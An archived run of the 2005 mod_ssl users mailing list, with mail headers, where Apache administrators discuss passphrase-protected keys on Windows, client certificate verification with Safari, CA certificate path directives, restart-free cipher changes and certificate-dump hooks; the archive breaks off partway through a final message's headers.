To: modssl-users@modssl.org
In-Reply-To: <20050629134931.41263.qmail@web51510.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b h 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--- b h  wrote:

> Hi
> 
> I finished doing my development and configuration of
> my server, and was just beginning to enable SSL on
> the
> server to protect certain pages which contain
> passwords.  
> 
> I have apache2 installed as a service on W32,
> 
> I have server cert in ./conf/server.crt/ and
> associated private key (encrypted) in
> ./conf/server.key/  I figured whenever starting the
> service I'd type in the password.
> 
> just to make it easy (I will figure out how to start
> the server properly as a service with SSL later), I
> uncommented the ifdef/endif in ssl.conf, made the
> appropriate ssl configurations, and tried to start
> apache.
> 
> I received this error in my error log:
> [Tue Jun 28 21:16:43 2005] [error] Init:
> SSLPassPhraseDialog builtin is not supported on
> Win32
> (key file M:/www/conf/ssl.key/server.key)
> 
> is this what I think it is?  Is there no method of
> starting Apache2 on W32 with an encrypted private
> key?
>  What are the suggestions?  How can I fix this or
> what
> am I missing (does it really mean I've messed up
> something else likely)?
> 
> thanks
> b
> 

Hi

I've read this of course,

http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslpassphrasedialog

but I still think it's likely has to be easier than
this - is there really not a builtin prompt for w32? 
even if apache is started from the command line and
not as a service?  I know I can write a small minimum
line program to "exec" and ask for the passphrase from
stdin - but really, I doubt I'm the first person to
ask this for the win32 platform...

thanks
b

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 30 04:05:13 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 79D9314D97C; Thu, 30 Jun 2005 04:05:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf16aec.mail.bellsouth.net (imf16aec.mail.bellsouth.net [205.152.59.64])
	by master.modssl.org (Postfix) with ESMTP id D1E3214D976
	for ; Thu, 30 Jun 2005 04:05:09 +0200 (CEST)
Received: from ibm58aec.bellsouth.net ([68.210.137.144])
          by imf16aec.mail.bellsouth.net with ESMTP
          id <20050630020508.DQFO25080.imf16aec.mail.bellsouth.net@ibm58aec.bellsouth.net>
          for ; Wed, 29 Jun 2005 22:05:08 -0400
Received: from [192.168.1.97] (really [68.210.137.144])
          by ibm58aec.bellsouth.net with ESMTP
          id <20050630020508.BPAS1856.ibm58aec.bellsouth.net@[192.168.1.97]>
          for ; Wed, 29 Jun 2005 22:05:08 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net> <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net>
Content-Type: multipart/alternative; boundary=Apple-Mail-1-55986566
Message-Id: <3D19E91D-3699-47F4-A6DE-63B8BB4E58BB@bellsouth.net>
From: lingwitt@bellsouth.net
Subject: Re: SSLVerifyClient
Date: Wed, 29 Jun 2005 22:05:07 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-1-55986566
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	delsp=yes;
	format=flowed

Firefox works like a charm.

On Jun 29, 2005, at 9:50 AM, lingwitt@bellsouth.net wrote:

> Indeed, the trouble was with Safari and Keychain. Apparently,  
> having more than one certificate confuses Safari. I am not sure  
> what to do now, except get a different browser. Any advice would be  
> appreciated.
>
> On Jun 28, 2005, at 11:01 AM, lingwitt@bellsouth.net wrote:
>
>> This can't be the problem, as I specify the CA using  
>> SSLCACertificatePath using the proper HASH names. I've also tried  
>> SSLCACertificateFile.
>>
>> using s_client with SSLVerifyClient optional, it shows that the  
>> server is correctly identifying which CAs are allowed.
>>
>> I think the problem is with Safari and Keychain. I shall look  
>> further into the matter.
>>
>> On Jun 28, 2005, at 10:27 AM, Paul Puschmann wrote:
>>
>>> I think that Eckard Wille might be right. So have some  
>>> experiments with
>>> your ca-files and certificates.
>>
>


--Apple-Mail-1-55986566
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=US-ASCII


Firefox works like a =
charm.

On Jun 29, 2005, at 9:50 AM, lingwitt@bellsouth.net =
wrote:

Indeed, the trouble was with Safari and Keychain. =
Apparently, having more than one certificate confuses Safari. I am not =
sure what to do now, except get a different browser. Any advice would be =
appreciated.

On Jun 28, 2005, at 11:01 AM, lingwitt@bellsouth.net =
wrote:

This can't be the problem, as I specify the CA using =
SSLCACertificatePath using the proper HASH names. I've also tried =
SSLCACertificateFile.

using s_client with =
SSLVerifyClient optional, it shows that the server is correctly =
identifying which CAs are allowed.

I think the problem is with =
Safari and Keychain. I shall look further into the =
matter.

On Jun 28, 2005, at 10:27 AM, Paul Puschmann =
wrote:

I think that Eckard Wille =
might be right. So have some experiments with
your ca-files and certificates.
 =




=

--Apple-Mail-1-55986566--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 30 07:30:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BFF1714D97F; Thu, 30 Jun 2005 07:30:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf19aec.mail.bellsouth.net (imf19aec.mail.bellsouth.net [205.152.59.67])
	by master.modssl.org (Postfix) with ESMTP id BD45314D97A
	for ; Thu, 30 Jun 2005 07:30:51 +0200 (CEST)
Received: from ibm60aec.bellsouth.net ([68.210.137.144])
          by imf19aec.mail.bellsouth.net with ESMTP
          id <20050630053051.BNDK28027.imf19aec.mail.bellsouth.net@ibm60aec.bellsouth.net>
          for ; Thu, 30 Jun 2005 01:30:51 -0400
Received: from [192.168.1.97] (really [68.210.137.144])
          by ibm60aec.bellsouth.net with ESMTP
          id <20050630053050.VAHE7767.ibm60aec.bellsouth.net@[192.168.1.97]>
          for ; Thu, 30 Jun 2005 01:30:50 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <3D19E91D-3699-47F4-A6DE-63B8BB4E58BB@bellsouth.net>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net> <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net> <3D19E91D-3699-47F4-A6DE-63B8BB4E58BB@bellsouth.net>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: lingwitt@bellsouth.net
Subject: SSLCACertificatePath
Date: Thu, 30 Jun 2005 01:30:49 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

User authentication works when I specify
SSLCACertificateFile

However, it does not work when I use
SSLCACertificatePath

I use the Makefile.crt renamed Makefile in the same directory pointed  
to by SSLCACertificatePath
The has symlinks are created.

The log shows that Apache loads those certificates in, but when I try  
to authenticate, it can't find them.

Thanks for your response.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 30 09:52:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E2F1914D97D; Thu, 30 Jun 2005 09:52:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mrbusi1.netcologne.de (mrbusi1.netcologne.de [194.8.194.213])
	by master.modssl.org (Postfix) with ESMTP id BF25E14D976
	for ; Thu, 30 Jun 2005 09:52:33 +0200 (CEST)
Received: from [127.0.0.1] (unknown [195.135.135.62])
	by mrbusi1.netcologne.de (Postfix) with ESMTP id 717001A0020
	for ; Thu, 30 Jun 2005 09:52:32 +0200 (CEST)
Message-ID: <42C3A45D.7070101@uzulabs.net>
Date: Thu, 30 Jun 2005 09:50:53 +0200
From: Paul Puschmann 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLCACertificatePath
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net> <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net> <3D19E91D-3699-47F4-A6DE-63B8BB4E58BB@bellsouth.net> 
In-Reply-To: 
X-Enigmail-Version: 0.92.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Puschmann 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

lingwitt@bellsouth.net wrote:
> User authentication works when I specify
> SSLCACertificateFile
> 
> However, it does not work when I use
> SSLCACertificatePath
> 
> I use the Makefile.crt renamed Makefile in the same directory pointed 
> to by SSLCACertificatePath
> The has symlinks are created.
> 
> The log shows that Apache loads those certificates in, but when I try 
> to authenticate, it can't find them.
> 
Yes, there are some problems with SSLCACertificatePath.
I used SSLCACertificateFile and have put all certificate-entries in one
file. This worked for me.

Paul
- --
Linux-User #271918 with the Linux Counter, http://counter.li.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)

iEYEARECAAYFAkLDpF0ACgkQqErKtBWD7VRs+wCfSsCouThgc6mT5MyQprbvCbJi
rDkAoPFUHhuQo1e9uLJF/WBDrRZkCs6F
=bVdr
-----END PGP SIGNATURE-----

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 30 09:54:00 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4E93014D97F; Thu, 30 Jun 2005 09:54:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mrbusi1.netcologne.de (mrbusi1.netcologne.de [194.8.194.213])
	by master.modssl.org (Postfix) with ESMTP id 2940514D976
	for ; Thu, 30 Jun 2005 09:53:59 +0200 (CEST)
Received: from [127.0.0.1] (unknown [195.135.135.62])
	by mrbusi1.netcologne.de (Postfix) with ESMTP id 9CB041A0052
	for ; Thu, 30 Jun 2005 09:53:59 +0200 (CEST)
Message-ID: <42C3A4B5.9060907@uzulabs.net>
Date: Thu, 30 Jun 2005 09:52:21 +0200
From: Paul Puschmann 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net> <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net>
In-Reply-To: <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net>
X-Enigmail-Version: 0.92.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Puschmann 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

lingwitt@bellsouth.net wrote:
> Indeed, the trouble was with Safari and Keychain. Apparently, having
> more than one certificate confuses Safari. I am not sure what to do now,
> except get a different browser. Any advice would be appreciated.
> 
> On Jun 28, 2005, at 11:01 AM, lingwitt@bellsouth.net
>  wrote:
> 
>> This can't be the problem, as I specify the CA using
>> SSLCACertificatePath using the proper HASH names. I've also tried
>> SSLCACertificateFile.
>>
>> using s_client with SSLVerifyClient optional, it shows that the server
>> is correctly identifying which CAs are allowed.
>>
>> I think the problem is with Safari and Keychain. I shall look further
>> into the matter.
>>
Please answer BELOW THE QUOTE! Thank you.

Perhaps you could file a bug against Safari (or have a look in their
bug-database (if existent)).

Paul
- --
Linux-User #271918 with the Linux Counter, http://counter.li.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)

iEYEARECAAYFAkLDpLUACgkQqErKtBWD7VQNWQCgu8DI++FBv5TCkrCDUUE5hrFC
nYAAnAtzNNr3g+ljVeP8jEBpvzgZ4Q4y
=bgbS
-----END PGP SIGNATURE-----

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 30 18:06:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 672FE14D97F; Thu, 30 Jun 2005 18:06:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf25aec.mail.bellsouth.net (imf25aec.mail.bellsouth.net [205.152.59.73])
	by master.modssl.org (Postfix) with ESMTP id B340814D976
	for ; Thu, 30 Jun 2005 18:06:53 +0200 (CEST)
Received: from ibm69aec.bellsouth.net ([68.210.137.144])
          by imf25aec.mail.bellsouth.net with ESMTP
          id <20050630160650.EZLO2565.imf25aec.mail.bellsouth.net@ibm69aec.bellsouth.net>
          for ; Thu, 30 Jun 2005 12:06:50 -0400
Received: from [192.168.1.97] (really [68.210.137.144])
          by ibm69aec.bellsouth.net with ESMTP
          id <20050630160649.TYZI13045.ibm69aec.bellsouth.net@[192.168.1.97]>
          for ; Thu, 30 Jun 2005 12:06:49 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <42C3A4B5.9060907@uzulabs.net>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net> <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net> <42C3A4B5.9060907@uzulabs.net>
Content-Type: multipart/alternative; boundary=Apple-Mail-4-106417918
Message-Id: <140A2DCB-4651-4702-B851-4B34F9E29D4F@bellsouth.net>
From: lingwitt@bellsouth.net
Subject: Re: SSLVerifyClient
Date: Thu, 30 Jun 2005 12:05:38 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-4-106417918
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	format=flowed

On Jun 30, 2005, at 3:52 AM, Paul Puschmann wrote:

> Please answer BELOW THE QUOTE! Thank you.

I'm sorry about that. Thanks for the responses.


--Apple-Mail-4-106417918
Content-Transfer-Encoding: 7bit
Content-Type: text/html;
	charset=US-ASCII


On Jun 30, 2005, at 3:52 AM, Paul Puschmann wrote:

Please answer BELOW THE QUOTE! Thank you.
 

I'm sorry about that. Thanks for the responses.


--Apple-Mail-4-106417918--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  1 09:26:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 176D114D984; Fri,  1 Jul 2005 09:26:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web30313.mail.mud.yahoo.com (web30313.mail.mud.yahoo.com [68.142.201.231])
	by master.modssl.org (Postfix) with SMTP id 6D43D14D97E
	for ; Fri,  1 Jul 2005 09:26:37 +0200 (CEST)
Received: (qmail 11241 invoked by uid 60001); 1 Jul 2005 07:26:36 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=12YzUGDNqMPzDtpYOfEWKFnqMJH97fHmyhIr4lq7HO0V+/xMpvFKme6rRYnSde4V1R5VVhhLU1/JKqsKDb+k5NXzUm2+UAVxJmyLbFCC4XAvOkw3sXphCb21anrYlC/izTFxfgFqUyIMHuqtAxdSgz1iQD2ruOMCadEoSA5XhP0=  ;
Message-ID: <20050701072636.11239.qmail@web30313.mail.mud.yahoo.com>
Received: from [202.144.61.173] by web30313.mail.mud.yahoo.com via HTTP; Fri, 01 Jul 2005 00:26:36 PDT
Date: Fri, 1 Jul 2005 00:26:36 -0700 (PDT)
From: Sourabh Bhandari 
Subject: change cipher suite of a virtual host without restarting apache
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sourabh Bhandari 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, 

I've Apache running as reverse proxy on Linux with SSL
(mod_ssl). 

There are multiple sites behind the Apache. 

There are cases when cipher-suite or certificate for a
site has to be changed. In that case Apache is
restarted to take changes in account. 

This results in disconnection of all the connected
users (whether they are connected for site for which
changes are done or for the sie for which nothing has
been changed).

Is there a way I can modify cipher-suite or
certificate so that I dont need to restart the Apache
and all the users session stay valid and working. (I
wont mind if users connected to site for which changes
are made get disconnected).

Thanks in advance, 

-Sourabh

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  1 16:27:27 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1675714D986; Fri,  1 Jul 2005 16:27:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42410.mail.yahoo.com (web42410.mail.yahoo.com [66.218.93.233])
	by master.modssl.org (Postfix) with SMTP id 531CD14D97E
	for ; Fri,  1 Jul 2005 16:27:25 +0200 (CEST)
Received: (qmail 66590 invoked by uid 60001); 1 Jul 2005 14:27:23 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=FehYIFwREjGDhfPj/H5TMVjMIs3Dg/MFzZMXfaYdkjyZgiMYSzdcx1iStrhkv2QTb1FEVstPg+XMZ8AdTkl31ZkExCa1SQEaA0JKk7dvPRmYQf/Yxf57FXUiZHT/frtm8JuotOpm7QpMacmfcS7u8b1m1TNiDQjoqwrSCcNHajk=  ;
Message-ID: <20050701142723.66588.qmail@web42410.mail.yahoo.com>
Received: from [62.129.121.32] by web42410.mail.yahoo.com via HTTP; Fri, 01 Jul 2005 07:27:23 PDT
Date: Fri, 1 Jul 2005 07:27:23 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: change cipher suite of a virtual host without restarting apache
To: modssl-users@modssl.org
In-Reply-To: <20050701072636.11239.qmail@web30313.mail.mud.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

AFAIK this is not possible with a virtual host.
However there is no reason you can't run each virtual
host as it's own server (split off into own config,
use the -f and -d options). It really depends on the
your load and flexibility requirements. Currently some
servers I manage have 50+ apache servers. While not
the best for memory and efficency, the flexibility is
good.

Regards
Matt

--- Sourabh Bhandari 
wrote:

> Hi, 
> 
> I've Apache running as reverse proxy on Linux with
> SSL
> (mod_ssl). 
> 
> There are multiple sites behind the Apache. 
> 
> There are cases when cipher-suite or certificate for
> a
> site has to be changed. In that case Apache is
> restarted to take changes in account. 
> 
> This results in disconnection of all the connected
> users (whether they are connected for site for which
> changes are done or for the sie for which nothing
> has
> been changed).
> 
> Is there a way I can modify cipher-suite or
> certificate so that I dont need to restart the
> Apache
> and all the users session stay valid and working. (I
> wont mind if users connected to site for which
> changes
> are made get disconnected).
> 
> Thanks in advance, 
> 
> -Sourabh
> 
> __________________________________________________
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam
> protection around 
> http://mail.yahoo.com 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 


		
____________________________________________________ 
Yahoo! Sports 
Rekindle the Rivalries. Sign up for Fantasy Football 
http://football.fantasysports.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  1 17:08:49 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AEDF614D98B; Fri,  1 Jul 2005 17:08:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web42405.mail.yahoo.com (web42405.mail.yahoo.com [66.218.93.228])
	by master.modssl.org (Postfix) with SMTP id E3FE914D984
	for ; Fri,  1 Jul 2005 17:08:48 +0200 (CEST)
Received: (qmail 75429 invoked by uid 60001); 1 Jul 2005 15:08:31 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=usDSt5IpYNBzwi3DbbHY5xa/BG3LSboWsRlXg050S8ln7HSv6QYKDLYDeIRJahQ5iwynre6HzH7tsMy0OkYnYs8NuG6mEfurlxRR1oyNAOlfIZ0Tpw12Jjk9LEaiL8ciMQQxdnif8+m9ZHmjKE52/7b/9bUZXtlBgzDbRVwMP0k=  ;
Message-ID: <20050701150831.75427.qmail@web42405.mail.yahoo.com>
Received: from [62.129.121.32] by web42405.mail.yahoo.com via HTTP; Fri, 01 Jul 2005 08:08:31 PDT
Date: Fri, 1 Jul 2005 08:08:31 -0700 (PDT)
From: Matt Stevenson 
Subject: Client certificate expiry handling
To: modssl-users@modssl.org
In-Reply-To: <20050701142723.66588.qmail@web42410.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I know this has been raised before but please read on.

Currently AFAIK client certificate expiry checking is
done by openssl and the connection is terminated
before apache comes into play, hence no error page can
be sent. This is a problem as IE doesn't tell the user
the client certificate is expired. Hence the user
experiences a horrible disconnect page (not nice for
issue tracking either as its pretty generic).

Both Netscape and IIS can send back an error to the
browser under this condition. The company I work for
would also like apache to be able to do this. There is
a good possiblity that the changes would be funded.

I'm looking for someone who has experience with
apache/mod_ssl/openssl to give an idea on the
feasibility and a time estimate to do the work.
Suggestions on who could do this are also welcome.

Regards
Matt


		
__________________________________ 
Yahoo! Mail Mobile 
Take Yahoo! Mail with you! Check email on your mobile phone. 
http://mobile.yahoo.com/learn/mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  5 06:54:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 020DA14D998; Tue,  5 Jul 2005 06:54:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from house.arach.net.au (house2.arach.net.au [203.30.44.85])
	by master.modssl.org (Postfix) with ESMTP id 9CB6014D979
	for ; Tue,  5 Jul 2005 06:54:39 +0200 (CEST)
Received: (qmail 18228 invoked from network); 5 Jul 2005 04:54:37 -0000
Message-ID: <20050705045437.18227.qmail@house.arach.net.au>
Received: from unknown (HELO pj28) (pj@netfire.com.au@203.153.243.58)
  by house2.arach.net.au with ESMTPA; 5 Jul 2005 04:54:36 -0000
From: "Pj" 
To: 
Subject: Dumping SSL Certificates form mod_ssl in apache
Date: Tue, 5 Jul 2005 12:49:07 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0857_01C5815F.EEC91940"
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcWBHN/I2lqr3DNJSbiAlWzdEDPxbw==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pj" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0857_01C5815F.EEC91940
Content-Type: text/plain;
	charset="windows-1250"
Content-Transfer-Encoding: 7bit

 

Hi all,

 

I am writing a module for apache that needs to dump client certificate
information from mod_ssl which ultimately uses OpenSSL...

 

Does anyone have any idea how to apply this hook?

 

Thanks..

Pj.

 

 


-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.323 / Virus Database: 267.8.9/39 - Release Date: 4/07/2005
 

------=_NextPart_000_0857_01C5815F.EEC91940
Content-Type: text/html;
	charset="windows-1250"
Content-Transfer-Encoding: quoted-printable


















 



Hi all,



 



I am writing a module for =
apache
that needs to dump client certificate information from mod_ssl which =
ultimately
uses OpenSSL...



 



Does anyone have any idea =
how to
apply this hook?



 



Thanks..



Pj.



 



 












--

No virus found in this outgoing message.

Checked by AVG Anti-Virus.

Version: 7.0.323 / Virus Database: 267.8.9/39 - Release Date: =
4/07/2005

 


------=_NextPart_000_0857_01C5815F.EEC91940--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  5 10:00:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C062214D998; Tue,  5 Jul 2005 10:00:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frcldn101.fr1.usf.ihost.com (frcldn101.fr1.usf.ihost.com [129.35.128.8])
	by master.modssl.org (Postfix) with ESMTP id 8A97A14D979
	for ; Tue,  5 Jul 2005 10:00:20 +0200 (CEST)
Received: from fr100ix3aspws04.aspaway.org (fr100ix3aspws04.clg.usf.ibm.com [129.35.132.112])
	by frcldn101.fr1.usf.ihost.com (Switch-2.2.8/Switch-2.2.8) with ESMTP id j6580Hu20672
